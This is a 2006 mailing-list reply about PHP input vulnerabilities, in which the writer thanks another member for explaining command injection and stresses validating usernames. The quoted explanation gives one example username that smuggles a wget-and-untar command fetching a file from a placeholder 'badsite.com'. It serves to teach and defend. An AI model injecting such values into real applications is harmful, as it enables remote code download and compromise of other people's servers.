[CS-FSLUG] PHP vulnerabilities?
Ed Hurst
ehurst at asisaid.com
Fri Jun 2 09:37:14 CDT 2006
Tim Young wrote:
> There are quite a number of ways to do this sort of thing. Most of the
> time it is a poorly written PHP (or other language) script. The basic
> thing is when you give someone the ability to input something. For
> example, a username.
>
> Instead of having a username "Tim", they use something like:
> "Tim; \"exec('wget http://badsite.com/badfile.tgz; tar -xzf
> badfile.tgz')\""
Excellent explanation! I may never, ever use PHP for anything, but I
understood the concept. Checking input for a valid user name, and
warning new users as they register, is thus a hallmark of having RTFM.
Thanks. I'll be using this the next time I get questions from site admins.
--
Ed Hurst
----------
Bible Application - http://ed.asisaid.com/bible/index.html
Plain & Simple Computer Help - http://ed.asisaid.com/
Mission, Method & Means - http://ed.asisaid.com/blog/
More information about the Christiansource
mailing list